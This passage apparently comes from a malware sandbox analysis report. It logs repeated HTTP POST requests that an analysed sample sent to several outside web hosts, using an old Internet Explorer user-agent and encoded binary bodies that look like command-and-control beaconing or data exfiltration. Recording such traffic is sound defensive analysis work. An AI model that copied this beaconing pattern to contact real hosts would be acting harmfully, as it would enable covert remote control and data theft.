5a 30 53 77 33 35 63 32 65 79 55 65 70 6a 39 63 51 68 53 51 6a 49 75 6f 42 6f 4c 7a 67 65 33 53 63 48 46 50 42 42 4b 4c 71 6b 6d 50 33 72 47 61 52 72 61 38 50 45 62 46 32 57 30 36 31 48 7a 4f 78 63 53 38 4d 4e 6d 31 63 62 62 50 49 73 57 67 6a 6b 6e 42 52 57 33 66 63 35 36 48 6f 4d 52 4c 4d 4f 55 31 75 79 47 67 52 42 71 67 31 4c 39 35 55 4f 32 4a 4b 6a 64 6f 70 4d 67 6b 6f 63 79 6d 4e 70 30 2b 61 66 2b 76 4b 4c 44 45 2f 71 70 61 50 50 7a 77 58 59 56 53 75 58 72 34 73 42 59 73 79 37 6e 4a 57 61 4f 4a 73 51 61 55 71 2f 6d 58 38 34 34 53 4d 63 3d Data Ascii: IsaY7fsYv2bIA6ldkjqaCOTYWcwBJ5PKX1Jj7mPsWwuZHBkJj68fega7yWir+TAxPI/D+CmaCidR9PnPd+uOR7JbK7L7ScmJflpxuEE6695GJ9Ms5GhtvFoSixnntZrlkNryXC2d6b/aT1DYRIgR5Lqg+m3+sRvRmoAviYEftaDawYmhX4MqKfUiWUPgeftRrsZtlAsxzw1vuKM2tAaE5CJG9u2LlFL9twlpB4UuUApkptFEVLSweVURw8WNeHYgnu9G4LcMdn2ravBONonDLEgqdzqWL+u2od6W8B3GgWcei23+wXXMZI6BVCNxPSB8do+JkuQdE4O3TSTHVrdPZlM17YP+5PM0X2Y+NQ9CGf9CzJz7RjG9GZ0Sw35c2eyUepj9cQhSQjIuoBoLzge3ScHFPBBKLqkmP3rGaRra8PEbF2W061HzOxcS8MNm1cbbPIsWgjknBRW3fc56HoMRLMOU1uyGgRBqg1L95UO2JKjdopMgkocymNp0+af+vKLDE/qpaPPzwXYVSuXr4sBYsy7nJWaOJsQaUq/mX844SMc=
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 564User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.crcsi.orgCache-Control: no-cacheData Raw: 33 41 63 7a 61 32 4e 39 79 32 61 54 32 6d 6d 4c 36 73 4e 6b 78 34 79 42 58 5a 65 4a 70 31 30 48 52 77 6b 71 51 63 75 47 64 35 2b 69 39 6c 4b 45 72 4a 59 63 34 6c 30 52 6c 42 64 75 51 43 59 62 55 36 6e 6c 6f 42 62 77 39 6e 51 37 62 6b 37 6c 5a 66 42 49 42 6b 4f 70 77 30 68 2b 55 4a 47 4e 56 4d 33 4b 41 56 58 51 47 66 6a 52 79 6c 73 35 4c 4c 41 6b 59 51 4f 61 6c 33 32 36 4f 72 47 49 56 46 66 31 54 52 45 65 76 46 58 41 71 43 2b 7a 4b 39 43 46 41 68 58 69 49 4c 34 7a 65 61 4f 66 32 6d 6e 59 33 6f 6e 47 38 70 70 57 70 52 61 7a 53 68 64 79 38 72 49 69 6e 65 55 54 4f 77 50 62 61 66 68 4e 64 33 50 30 50 64 37 38 36 69 46 64 39 7a 4c 6a 41 4d 69 48 59 6f 35 4e 51 32 57 73 39 67 7a 78 6d 5a 55 33 38 5a 6c 38 4a 4f 48 4c 58 67 74 71 61 6c 56 54 2f 2b 33 4a 63 71 6c 4e 4b 53 47 63 6d 36 33 4f 4c 6e 64 2f 30 73 4f 79 61 36 4e 4f 6c 36 69 76 6d 47 67 54 47 43 70 38 45 4d 71 43 67 65 4c 41 72 46 79 65 37 75 73 65 70 4f 57 63 36 59 63 5a 42 4b 67 6f 41 34 35 38 64 53 67 4c 57 62 6c 4a 48 4a 7a 6d 56 64 6a 68 68 5a 69 79 6e 5a 61 55 46 63 34 41 4a 58 4c 62 4b 6c 71 6b 70 79 31 67 2f 30 43 6b 43 47 36 4f 4d 4b 76 42 36 6c 65 6d 4a 33 30 75 58 38 72 4d 32 58 76 66 75 74 4f 2b 62 2b 76 31 79 7a 45 31 6f 4a 49 74 64 46 4d 68 2b 62 4d 2f 42 76 64 4c 78 34 51 64 53 50 44 4c 71 34 78 4a 7a 72 75 72 30 39 6f 55 75 53 70 70 77 33 64 74 63 70 7a 7a 67 6d 4b 70 52 4b 69 55 48 63 39 61 6b 6d 45 42 34 2f 65 41 44 38 33 6a 31 7a 4b 39 4d 4b 2b 35 49 76 32 49 43 61 4f 4b 75 51 41 63 37 77 36 32 77 59 68 4c 55 75 6c 5a 70 39 6e 57 54 4e 5a 6e 4e 5a 35 57 47 41 66 79 42 56 45 71 43 7a 50 46 76 35 55 37 4c 38 72 73 4b 49 33 59 2f 31 41 5a 61 2b 57 72 4e 37 74 6c 33 4b 39 63 79 4f 4a 6d 63 34 73 3d Data Ascii: 3Acza2N9y2aT2mmL6sNkx4yBXZeJp10HRwkqQcuGd5+i9lKErJYc4l0RlBduQCYbU6nloBbw9nQ7bk7lZfBIBkOpw0h+UJGNVM3KAVXQGfjRyls5LLAkYQOal326OrGIVFf1TREevFXAqC+zK9CFAhXiIL4zeaOf2mnY3onG8ppWpRazShdy8rIineUTOwPbafhNd3P0Pd786iFd9zLjAMiHYo5NQ2Ws9gzxmZU38Zl8JOHLXgtqalVT/+3JcqlNKSGcm63OLnd/0sOya6NOl6ivmGgTGCp8EMqCgeLArFye7usepOWc6YcZBKgoA458dSgLWblJHJzmVdjhhZiynZaUFc4AJXLbKlqkpy1g/0CkCG6OMKvB6lemJ30uX8rM2XvfutO+b+v1yzE1oJItdFMh+bM/BvdLx4QdSPDLq4xJzrur09oUuSppw3dtcpzzgmKpRKiUHc9akmEB4/eAD83j1zK9MK+5Iv2ICaOKuQAc7w62wYhLUulZp9nWTNZnNZ5WGAfyBVEqCzPFv5U7L8rsKI3Y/1AZa+WrN7tl3K9cyOJmc4s=
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 604User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.ora-ito.comCache-Control: no-cacheData Raw: 36 74 7a 2b 49 55 6d 39 32 57 5a 77 43 72 63 43 6d 4b 59 4a 73 32 4a 59 44 47 52 6e 6c 4c 30 51 6a 63 79 62 62 67 4f 6a 7a 73 76 4e 6e 6e 4c 62 51 33 41 69 74 64 57 31 2b 79 2b 55 44 73 4d 4d 6b 62 2f 56 37 34 53 49 33 2f 59 7a 54 38 70 33 79 55 49 32 4d 34 65 6d 57 53 2f 59 53 78 48 66 41 70 44 43 41 33 30 4d 64 6f 70 4f 54 45 68 6c 77 4f 4d 31 48 33 52 74 50 79 31 73 32 6e 6d 45 68 6c 43 77 69 4d 68 71 77 35 62 68 78 72 4d 71 36 2f 6b 69 2b 4e 45 76 41 69 61 36 59 33 4d 75 2b 63 65 6f 76 52 54 55 63 4a 6f 6a 75 39 72 32 74 37 43 34 58 35 58 6f 6f 41 6f 42 41 2f 79 76 71 41 4f 65 59 57 63 59 4e 77 43 52 6a 30 30 50 51 50 69 54 4e 31 59 51 39 4d 39 65 6e 72 62 33 56 73 6f 44 37 2f 59 70 6d 77 62 77 50 57 77 39 47 78 42 64 74 71 6b 64 54 39 6c 2b 6b 55 4b 77 47 79 77 74 6c 68 4f 45 61 56 69 32 50 45 57 58 75 62 6e 39 47 30 76 50 76 4f 39 41 56 4d 48 61 72 36 64 54 63 69 4c 49 72 34 34 58 33 6f 6d 49 30 62 6e 4a 73 2f 59 57 47 58 37 2b 74 78 64 49 55 43 38 2b 65 48 41 66 45 54 36 42 44 70 6a 4b 7a 4d 42 4a 62 5a 68 74 69 72 78 53 49 75 31 71 66 56 61 51 74 36 64 6d 48 78 7a 6e 39 6d 31 65 51 71 73 64 6d 31 65 2f 6e 42 61 6a 55 7a 38 75 39 61 6f 2b 7a 48 4b 62 55 63 57 59 35 37 41 44 74 74 64 4b 4f 33 6e 47 49 7a 44 6a 51 39 63 6b 4f 44 44 57 44 64 4c 38 49 77 5a 66 54 74 49 51 2b 43 7a 62 32 4b 2b 55 44 75 58 48 72 35 72 66 64 69 4a 2f 31 79 48 45 61 50 7a 4a 67 7a 34 61 4a 4c 41 46 65 63 4d 54 4a 67 54 76 78 31 53 4e 72 53 31 48 67 52 47 2b 2b 6c 4c 45 4a 6b 37 45 46 54 34 68 77 4a 7a 4b 51 30 37 37 34 6d 77 5a 7a 64 4a 48 6e 73 6e 32 61 67 45 79 4f 52 49 4f 33 4f 62 46 35 65 5a 58 49 43 62 54 7a 76 44 72 44 54 59 34 49 59 78 48 34 41 6e 5a 2f 31 6e 73 6b 4c 52 63 68 77 44 36 61 4b 56 42 62 7a 33 6b 6c 4d 33 38 61 32 6d 52 38 57 59 44 57 2f 4f 6e 72 76 63 54 65 52 44 34 6f 67 3d 3d Data Ascii: 6tz+IUm92WZwCrcCmKYJs2JYDGRnlL0QjcybbgOjzsvNnnLbQ3AitdW1+y+UDsMMkb/V74SI3/YzT8p3yUI2M4emWS/YSxHfApDCA30MdopOTEhlwOM1H3RtPy1s2nmEhlCwiMhqw5bhxrMq6/ki+NEvAia6Y3Mu+ceovRTUcJoju9r2t7C4X5XooAoBA/yvqAOeYWcYNwCRj00PQPiTN1YQ9M9enrb3VsoD7/YpmwbwPWw9GxBdtqkdT9l+kUKwGywtlhOEaVi2PEWXubn9G0vPvO9AVMHar6dTciLIr44X3omI0bnJs/YWGX7+txdIUC8+eHAfET6BDpjKzMBJbZhtirxSIu1qfVaQt6dmHxzn9m1eQqsdm1e/nBajUz8u9ao+zHKbUcWY57ADttdKO3nGIzDjQ9ckODDWDdL8IwZfTtIQ+Czb2K+UDuXHr5rfdiJ/1yHEaPzJgz4aJLAFecMTJgTvx1SNrS1HgRG++lLEJk7EFT4hwJzKQ0774mwZzdJHnsn2agEyORIO3ObF5eZXICbTzvDrDTY4IYxH4AnZ/1nskLRchwD6aKVBbz3klM38a2mR8WYDW/OnrvcTeRD4og==
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 604User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.ora-ito.comCache-Control: no-cacheData Raw: 36 74 7a 2b 49 55 6d 39 32 57 5a 77 43 72 63 43 6d 4b 59 4a 73 32 4a 59 44 47 52 6e 6c 4c 30 51 6a 63 79 62 62 67 4f 6a 7a 73 76 4e 6e 6e 4c 62 51 33 41 69 74 64 57 31 2b 79 2b 55 44 73 4d 4d 6b 62 2f 56 37 34 53 49 33 2f 59 7a 54 38 70 33 79 55 49 32 4d 34 65 6d 57 53 2f 59 53 78 48 66 41 70 44 43 41 33 30 4d 64 6f 70 4f 54 45 68 6c 77 4f 4d 31 48 33 52 74 50 79 31 73 32 6e 6d 45 68 6c 43 77 69 4d 68 71 77 35 62 68 78 72 4d 71 36 2f 6b 69 2b 4e 45 76 41 69 61 36 59 33 4d 75 2b 63 65 6f 76 52 54 55 63 4a 6f 6a 75 39 72 32 74 37 43 34 58 35 58 6f 6f 41 6f 42 41 2f 79 76 71 41 4f 65 59 57 63 59 4e 77 43 52 6a 30 30 50 51 50 69 54 4e 31 59 51 39 4d 39 65 6e 72 62 33 56 73 6f 44 37 2f 59 70 6d 77 62 77 50 57 77 39 47 78 42 64 74 71 6b 64 54 39 6c 2b 6b 55 4b 77 47 79 77 74 6c 68 4f 45 61 56 69 32 50 45 57 58 75 62 6e 39 47 30 76 50 76 4f 39 41 56 4d 48 61 72 36 64 54 63 69 4c 49 72 34 34 58 33 6f 6d 49 30 62 6e 4a 73 2f 59 57 47 58 37 2b 74 78 64 49 55 43 38 2b 65 48 41 66 45 54 36 42 44 70 6a 4b 7a 4d 42 4a 62 5a 68 74 69 72 78 53 49 75 31 71 66 56 61 51 74 36 64 6d 48 78 7a 6e 39 6d 31 65 51 71 73 64 6d 31 65 2f 6e 42 61 6a 55 7a 38 75 39 61 6f 2b 7a 48 4b 62 55 63 57 59 35 37 41 44 74 74 64 4b 4f 33 6e 47 49 7a 44 6a 51 39 63 6b 4f 44 44 57 44 64 4c 38 49 77 5a 66 54 74 49 51 2b 43 7a 62 32 4b 2b 55 44 75 58 48 72 35 72 66 64 69 4a 2f 31 79 48 45 61 50 7a 4a 67 7a 34 61 4a 4c 41 46 65 63 4d 54 4a 67 54 76 78 31 53 4e 72 53 31 48 67 52 47 2b 2b 6c 4c 45 4a 6b 37 45 46 54 34 68 77 4a 7a 4b 51 30 37 37 34 6d 77 5a 7a 64 4a 48 6e 73 6e 32 61 67 45 79 4f 52 49 4f 33 4f 62 46 35 65 5a 58 49 43 62 54 7a 76 44 72 44 54 59 34 49 59 78 48 34 41 6e 5a 2f 31 6e 73 6b 4c 52 63 68 77 44 36 61 4b 56 42 62 7a 33 6b 6c 4d 33 38 61 32 6d 52 38 57 59 44 57 2f 4f 6e 72 76 63 54 65 52 44 34 6f 67 3d 3d Data Ascii: 6tz+IUm92WZwCrcCmKYJs2JYDGRnlL0QjcybbgOjzsvNnnLbQ3AitdW1+y+UDsMMkb/V74SI3/YzT8p3yUI2M4emWS/YSxHfApDCA30MdopOTEhlwOM1H3RtPy1s2nmEhlCwiMhqw5bhxrMq6/ki+NEvAia6Y3Mu+ceovRTUcJoju9r2t7C4X5XooAoBA/yvqAOeYWcYNwCRj00PQPiTN1YQ9M9enrb3VsoD7/YpmwbwPWw9GxBdtqkdT9l+kUKwGywtlhOEaVi2PEWXubn9G0vPvO9AVMHar6dTciLIr44X3omI0bnJs/YWGX7+txdIUC8+eHAfET6BDpjKzMBJbZhtirxSIu1qfVaQt6dmHxzn9m1eQqsdm1e/nBajUz8u9ao+zHKbUcWY57ADttdKO3nGIzDjQ9ckODDWDdL8IwZfTtIQ+Czb2K+UDuXHr5rfdiJ/1yHEaPzJgz4aJLAFecMTJgTvx1SNrS1HgRG++lLEJk7EFT4hwJzKQ0774mwZzdJHnsn2agEyORIO3ObF5eZXICbTzvDrDTY4IYxH4AnZ/1nskLRchwD6aKVBbz3klM38a2mR8WYDW/OnrvcTeRD4og==
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 576User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.jenco.co.ukCache-Control: no-cacheData Raw: 61 68 43 42 4e 72 4c 70 48 47 64 43 6c 58 55 38 35 62 31 6c 30 4c 56 6c 55 74 71 43 68 34 4e 49 42 75 74 62 34 50 69 6f 68 4f 72 71 6c 53 61 4c 39 4e 37 43 2f 4d 66 30 5a 77 4c 42 45 44 4c 53 78 6e 4f 42 4e 6c 6c 76 6f 71 6c 55 2b 56 2f 33 76 7a 75 4c 34 2f 69 47 37 2b 2f 58 62 49 4c 41 39 71 58 69 74 2b 37 64 37 32 51 69 44 2b 67 51 44 57 70 68 41 4c 48 73 45 2b 53 4a 72 73 55 49 34 6e 45 49 32 6b 77 45 77 35 49 33 34 65 62 66 50 34 72 61 42 63 4c 58 67 59 53 36 6f 78 36 43 6f 67 6b 39 77 73 4a 6e 77 39 48 36 2f 49 4b 4d 75 71 6c 6e 63 55 61 32 62 61 53 43 63 50 58 68 4d 61 71 49 52 50 4b 32 49 58 76 68 67 42 45 31 58 54 74 35 36 66 38 32 44 53 56 47 46 78 66 62 5a 61 31 66 31 76 63 2f 2b 47 41 2b 51 54 57 63 4f 79 62 55 54 41 71 72 79 33 47 6d 4a 41 5a 32 55 34 76 36 52 70 55 6c 55 47 72 7a 41 63 79 65 48 54 44 55 55 49 72 6d 44 54 39 34 44 31 56 6b 51 62 44 76 38 46 4b 6b 79 62 50 50 4a 66 77 31 45 68 49 71 4b 42 71 6a 51 67 51 6d 52 4d 44 32 46 6f 6a 56 37 56 6b 55 64 6c 6d 71 58 7a 4b 70 50 7a 5a 6b 72 4f 4e 5a 71 43 63 4e 2b 61 57 55 75 46 4f 6d 32 77 74 78 4c 2f 62 72 73 7a 52 6d 43 53 4c 67 73 32 79 73 45 48 59 59 51 30 6b 74 32 33 6a 58 73 77 4e 55 70 73 6e 74 78 48 66 74 46 36 74 74 79 48 64 69 70 33 46 6e 44 65 74 2b 66 79 34 34 45 63 6b 31 72 66 50 56 66 54 74 35 76 2b 6e 6c 2f 4f 74 48 30 50 39 55 6a 45 39 6f 35 52 6e 75 65 35 46 32 37 4a 6a 6c 50 66 5a 45 4c 2b 45 38 35 30 73 6c 63 74 50 63 33 53 6a 5a 52 46 33 6c 72 45 4b 6d 4d 59 65 57 4c 6b 6e 48 7a 4e 61 65 63 55 52 4c 52 55 4e 38 4a 49 63 55 6a 31 67 6c 77 75 47 35 52 71 6f 57 66 31 45 36 77 68 2f 53 34 72 66 75 33 33 39 61 44 37 30 55 5a 35 46 55 4e 7a 32 55 72 41 66 6f 65 41 4b 46 61 77 78 61 75 67 74 68 47 47 64 2f 51 77 3d 3d Data Ascii: ahCBNrLpHGdClXU85b1l0LVlUtqCh4NIButb4PiohOrqlSaL9N7C/Mf0ZwLBEDLSxnOBNllvoqlU+V/3vzuL4/iG7+/XbILA9qXit+7d72QiD+gQDWphALHsE+SJrsUI4nEI2kwEw5I34ebfP4raBcLXgYS6ox6Cogk9wsJnw9H6/IKMuqlncUa2baSCcPXhMaqIRPK2IXvhgBE1XTt56f82DSVGFxfbZa1f1vc/+GA+QTWcOybUTAqry3GmJAZ2U4v6RpUlUGrzAcyeHTDUUIrmDT94D1VkQbDv8FKkybPPJfw1EhIqKBqjQgQmRMD2FojV7VkUdlmqXzKpPzZkrONZqCcN+aWUuFOm2wtxL/brszRmCSLgs2ysEHYYQ0kt23jXswNUpsntxHftF6ttyHdip3FnDet+fy44Eck1rfPVfTt5v+nl/OtH0P9UjE9o5Rnue5F27JjlPfZEL+E850slctPc3SjZRF3lrEKmMYeWLknHzNaecURLRUN8JIcUj1glwuG5RqoWf1E6wh/S4rfu339aD70UZ5FUNz2UrAfoeAKFawxaugthGGd/Qw==
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 552User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.dgmna.comCache-Control: no-cacheData Raw: 47 70 52 44 4d 38 48 4f 48 47 66 64 45 6a 41 4b 6f 46 6b 66 4a 4a 6f 41 32 6b 51 2f 76 36 33 5a 68 54 45 54 6b 78 50 6c 50 4a 73 71 45 49 4c 47 70 6c 52 34 54 4a 68 67 57 5a 48 51 38 7a 6c 46 4a 4f 38 65 48 50 46 46 6d 61 73 6b 4d 43 77 77 76 46 34 69 76 56 52 36 50 7a 63 56 55 39 58 34 6e 68 38 7a 4c 79 6c 70 42 73 67 53 54 6e 4a 75 30 36 76 75 4d 6b 6e 4b 6a 5a 31 79 78 4b 4e 56 56 44 56 5a 2f 57 72 35 48 69 77 6a 52 59 75 6a 48 76 78 46 78 6f 48 54 2f 64 2f 79 59 55 34 49 6f 7a 47 53 30 6a 67 31 72 72 4c 64 6e 39 52 70 50 32 49 38 48 61 62 4d 61 61 6d 67 6e 47 72 66 73 78 51 6f 36 52 6b 4e 78 6a 7a 43 56 50 66 65 47 57 70 4e 44 54 57 54 75 56 51 37 59 76 57 38 75 32 77 66 56 62 45 6b 65 79 74 4b 51 52 78 50 45 53 53 4b 69 4d 6f 79 63 46 70 52 65 71 4c 55 39 44 54 4d 6c 70 59 42 37 6a 54 74 31 32 69 4d 73 75 59 30 54 69 30 56 66 47 47 56 2f 55 4e 47 6b 49 45 34 37 7a 79 72 79 52 6d 54 54 31 53 5a 62 33 64 36 4b 78 2f 46 37 43 67 33 65 5a 4e 65 43 76 58 31 75 52 4a 44 50 6d 72 73 35 30 43 31 58 63 76 6d 37 52 35 2b 7a 46 5a 50 70 6c 32 55 79 62 57 43 39 44 71 31 43 44 56 48 62 51 39 32 6d 44 42 6e 71 65 4e 73 7a 67 4c 2b 52 69 6f 61 2b 34 72 5a 61 6b 75 76 70 74 5a 48 70 50 4e 31 4d 46 34 57 37 30 6d 78 57 34 76 53 4f 5a 2f 44 69 56 5a 52 73 62 31 73 6d 4e 58 47 42 6c 4c 65 70 4c 34 76 5a 30 42 70 69 4d 56 50 55 69 63 78 50 41 65 42 31 4c 79 46 43 6a 35 30 6b 57 42 75 65 36 2b 4e 77 45 4e 71 4f 32 59 59 66 34 6e 4b 58 6c 62 76 31 59 67 6a 61 6c 45 68 79 57 49 72 4d 30 4b 70 37 68 5a 75 70 76 65 44 76 52 4f 47 47 35 57 48 46 32 4a 6c 68 52 64 33 66 70 32 31 64 55 77 4c 66 39 53 32 6b 39 73 4a 57 38 4c 57 56 79 67 73 4b 65 79 6c Data Ascii: GpRDM8HOHGfdEjAKoFkfJJoA2kQ/v63ZhTETkxPlPJsqEILGplR4TJhgWZHQ8zlFJO8eHPFFmaskMCwwvF4ivVR6PzcVU9X4nh8zLylpBsgSTnJu06vuMknKjZ1yxKNVVDVZ/Wr5HiwjRYujHvxFxoHT/d/yYU4IozGS0jg1rrLdn9RpP2I8HabMaamgnGrfsxQo6RkNxjzCVPfeGWpNDTWTuVQ7YvW8u2wfVbEkeytKQRxPESSKiMoycFpReqLU9DTMlpYB7jTt12iMsuY0Ti0VfGGV/UNGkIE47zyryRmTT1SZb3d6Kx/F7Cg3eZNeCvX1uRJDPmrs50C1Xcvm7R5+zFZPpl2UybWC9Dq1CDVHbQ92mDBnqeNszgL+Rioa+4rZakuvptZHpPN1MF4W70mxW4vSOZ/DiVZRsb1smNXGBlLepL4vZ0BpiMVPUicxPAeB1LyFCj50kWBue6+NwENqO2YYf4nKXlbv1YgjalEhyWIrM0Kp7hZupveDvROGG5WHF2JlhRd3fp21dUwLf9S2k9sJW8LWVygsKeyl
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 588User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.olras.comCache-Control: no-cacheData Raw: 69 79 50 42 6f 2f 5a 31 49 47 66 47 55 59 62 53 55 66 51 61 37 5a 6c 79 38 75 30 57 55 33 50 70 69 72 6b 54 78 69 49 42 46 52 56 44 42 44 57 54 68 77 59 56 57 52 67 47 52 4c 4a 49 62 43 2f 76 6f 37 43 52 38 42 4d 79 38 4a 4d 41 72 4c 4c 2b 71 78 4b 65 30 59 36 6f 36 79 42 39 49 42 77 4f 58 54 75 42 2b 73 70 45 39 44 4d 53 49 34 71 41 6a 47 52 61 53 6b 57 4b 58 31 51 35 4f 58 79 56 36 45 6a 42 31 79 69 74 33 78 54 45 59 47 37 69 6f 68 70 57 59 6f 70 37 48 6e 39 70 6c 30 52 39 4b 37 4f 36 62 38 45 79 33 72 42 6f 43 55 30 2f 31 78 63 66 2f 49 79 7a 6a 73 50 55 71 62 4b 6f 64 65 71 52 47 55 51 54 76 71 48 66 47 76 72 70 65 41 77 6d 61 4a 6a 76 34 6a 55 72 65 36 42 6d 42 30 58 66 6e 69 61 35 73 38 50 34 2f 6e 4d 35 45 50 49 43 78 53 4d 36 32 74 47 66 54 57 55 34 4a 68 61 44 53 4d 43 6f 77 47 59 64 58 45 39 61 70 64 50 6b 51 70 30 75 58 34 34 57 52 73 58 53 66 54 59 59 79 33 69 76 72 6f 78 63 79 37 34 6a 31 46 56 71 68 5a 44 69 4a 30 54 67 51 78 2f 65 73 36 5a 51 78 48 68 42 77 50 36 58 71 5a 2b 72 75 58 43 32 57 6c 2f 42 70 6c 49 7a 64 43 77 58 72 79 51 34 73 44 70 5a 51 52 77 70 65 66 4d 4c 56 4c 37 49 76 62 50 53 71 37 31 6d 74 39 7a 4b 58 37 71 58 74 47 35 73 55 76 4a 61 2b 61 58 47 43 42 50 45 41 48 38 61 6b 55 61 68 70 6c 4f 65 58 31 63 46 54 6b 72 77 6f 57 46 33 6a 50 37 35 52 58 69 51 71 33 6d 31 33 37 50 78 7a 4a 2b 7a 78 4f 4d 52 7a 31 77 7a 63 34 47 75 67 73 2f 48 70 6b 58 57 67 75 46 54 2b 48 6a 51 33 34 50 6c 6e 31 48 57 68 59 6c 64 72 30 35 63 55 59 78 31 54 70 57 6b 74 4b 42 6f 2f 48 74 35 53 34 46 39 61 51 44 42 62 47 66 69 68 4a 4a 55 38 4f 54 56 49 53 56 62 4c 49 62 33 4a 79 2b 6d 65 58 61 45 42 68 77 68 57 72 5a 47 53 66 33 58 58 63 4a 6d 4b 47 30 74 61 67 48 54 2b 4e 66 2b 43 36 36 6d 43 46 4c 74 47 51 46 53 75 77 35 4f Data Ascii: iyPBo/Z1IGfGUYbSUfQa7Zly8u0WU3PpirkTxiIBFRVDBDWThwYVWRgGRLJIbC/vo7CR8BMy8JMArLL+qxKe0Y6o6yB9IBwOXTuB+spE9DMSI4qAjGRaSkWKX1Q5OXyV6EjB1yit3xTEYG7iohpWYop7Hn9pl0R9K7O6b8Ey3rBoCU0/1xcf/IyzjsPUqbKodeqRGUQTvqHfGvrpeAwmaJjv4jUre6BmB0Xfnia5s8P4/nM5EPICxSM62tGfTWU4JhaDSMCowGYdXE9apdPkQp0uX44WRsXSfTYYy3ivroxcy74j1FVqhZDiJ0TgQx/es6ZQxHhBwP6XqZ+ruXC2Wl/BplIzdCwXryQ4sDpZQRwpefMLVL7IvbPSq71mt9zKX7qXtG5sUvJa+aXGCBPEAH8akUahplOeX1cFTkrwoWF3jP75RXiQq3m137PxzJ+zxOMRz1wzc4Gugs/HpkXWguFT+HjQ34Pln1HWhYldr05cUYx1TpWktKBo/Ht5S4F9aQDBbGfihJJU8OTVISVbLIb3Jy+meXaEBhwhWrZGSf3XXcJmKG0tagHT+Nf+C66mCFLtGQFSuw5O
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 580User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.quadlock.comCache-Control: no-cacheData Raw: 68 6e 4e 69 50 34 4d 7a 48 57 64 76 4b 6f 45 6f 69 73 4d 37 49 36 77 38 77 75 45 70 65 43 6f 33 5a 78 48 70 58 31 47 70 66 6d 4c 49 77 49 63 6c 47 55 37 74 6a 73 49 71 51 41 72 4b 6a 70 38 5a 56 39 36 68 4e 68 43 57 68 4d 79 78 6e 43 69 36 6b 4b 31 73 2f 66 35 37 56 56 53 68 35 4b 37 67 38 41 7a 62 62 36 2f 78 34 51 31 55 34 65 5a 52 75 6a 35 44 52 7a 48 59 6c 61 6d 49 77 6e 7a 43 34 5a 79 63 6c 76 7a 49 41 77 47 41 76 56 46 71 58 35 48 36 4b 33 63 4d 39 4b 64 4b 52 56 6d 63 76 50 6e 30 46 70 52 69 61 48 2b 63 4f 5a 7a 4d 71 48 4a 56 71 7a 5a 7a 59 68 4d 76 2f 2b 78 46 2f 64 75 48 65 68 72 55 34 52 55 58 65 2f 48 39 52 41 30 70 63 42 34 63 35 7a 69 2f 43 58 65 46 32 71 35 72 47 46 47 35 4e 47 46 72 66 6f 66 5a 41 36 67 72 65 36 4d 47 75 44 6f 51 67 47 4d 54 74 63 6c 4e 31 41 52 34 76 67 33 43 38 55 45 7a 58 77 65 4a 31 4a 39 72 66 61 4c 4b 4d 48 62 39 31 68 67 65 32 78 48 7a 56 5a 65 36 30 43 4f 61 31 51 39 31 31 79 61 47 2b 73 42 72 35 50 52 49 56 63 4a 36 51 4a 4d 30 6e 4f 4b 31 41 6d 5a 4f 4a 61 48 6c 66 65 71 33 49 30 43 76 59 78 5a 51 7a 6d 37 46 38 52 39 6e 54 38 54 51 4d 71 6e 70 57 54 67 75 39 58 70 46 57 78 46 53 37 38 44 77 4c 6c 41 43 63 63 45 67 6a 33 74 6a 39 4d 78 6e 48 6d 6d 4e 55 48 59 4a 42 68 52 53 54 4a 39 65 79 46 72 58 6d 4a 5a 7a 6c 31 45 53 66 6f 2f 6c 43 77 79 4d 6e 70 32 33 46 47 5a 53 2b 61 6f 64 6b 31 67 59 38 70 39 62 70 37 43 43 38 6d 6a 70 4e 69 61 51 73 4a 4b 31 56 56 74 54 61 73 77 70 62 6b 41 32 4c 64 7a 63 36 54 52 6a 31 46 38 50 6f 7a 5a 6e 47 56 34 64 68 78 79 5a 6c 66 61 56 5a 4e 52 45 6f 50 69 33 64 71 4b 62 7a 4a 58 43 75 4c 77 31 33 30 74 34 4d 72 54 62 6f 45 37 45 36 7a 74 2b 54 39 66 2b 4d 33 6b 42 73 58 59 45 31 2b 7a 63 65 41 66 70 6f 32 4e 4c 32 6d 4a 32 6f 6c 30 3d Data Ascii: 